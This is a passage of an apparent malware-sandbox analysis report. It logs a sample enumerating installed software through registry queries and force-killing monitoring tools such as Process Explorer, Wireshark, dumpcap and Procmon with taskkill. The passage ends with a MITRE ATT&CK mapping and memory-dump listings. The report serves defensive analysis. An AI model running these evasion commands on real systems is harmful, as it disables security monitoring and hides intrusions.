- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}" /reg:64
    3⤵
    PID:4676
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}" /reg:32
    3⤵
    PID:4848
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4980
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Google Chrome" /reg:64
    3⤵
    PID:4140
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Google Chrome" /reg:32
    3⤵
    PID:584
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "procexp.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:4768
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:3880
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2151757" /reg:64
    3⤵
    PID:4024
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2151757" /reg:32
    3⤵
    PID:2608
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:1000
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2467173" /reg:64
    3⤵
    PID:4992
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2467173" /reg:32
    3⤵
    PID:1236
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4480
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2524860" /reg:64
    3⤵
    PID:4588
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2524860" /reg:32
    3⤵
    PID:4640
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4504
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2544655" /reg:64
    3⤵
    PID:1076
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2544655" /reg:32
    3⤵
    PID:68
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4924
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2549743" /reg:64
    3⤵
    PID:3792
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2549743" /reg:32
    3⤵
    PID:5008
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:1148
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2565063" /reg:64
    3⤵
    PID:4768
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2565063" /reg:32
    3⤵
    PID:5052
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:1720
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB982573" /reg:64
    3⤵
    PID:2668
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB982573" /reg:32
    3⤵
    PID:4380
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4512
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{4A03706F-666A-4037-7777-5F2748764D10}" /reg:64
    3⤵
    PID:4700
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{4A03706F-666A-4037-7777-5F2748764D10}" /reg:32
    3⤵
    PID:4884
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4144
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}" /reg:64
    3⤵
    PID:1476
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}" /reg:32
    3⤵
    PID:1596
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4800
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}" /reg:64
    3⤵
    PID:1964
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}" /reg:32
    3⤵
    PID:1236
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "wireshark.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:4496
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:584
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}" /reg:64
    3⤵
    PID:2120
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}" /reg:32
    3⤵
    PID:2176
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4744
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}" /reg:64
    3⤵
    PID:3860
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}" /reg:32
    3⤵
    PID:5136
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "tshark.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:5172
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "text2pcap.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:5236
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "rawshark.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:5300
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "dumpcap.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:5364
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "capinfos.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:5424
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "Procmon.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:5484

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Hidden Files and Directories

T1158

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Disabling Security Tools

T1089

Hidden Files and Directories

T1158

Modify Registry

T1112

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/3020-98-0x0000014075DF0000-0x0000014075DF1000-memory.dmp

Filesize
4KB

Download
memory/3020-106-0x0000014075FA0000-0x0000014075FA1000-memory.dmp

Filesize
4KB

Download
memory/3020-81-0x00007FFCD2DD0000-0x00007FFCD37BC000-memory.dmp

Filesize
9.9MB

Download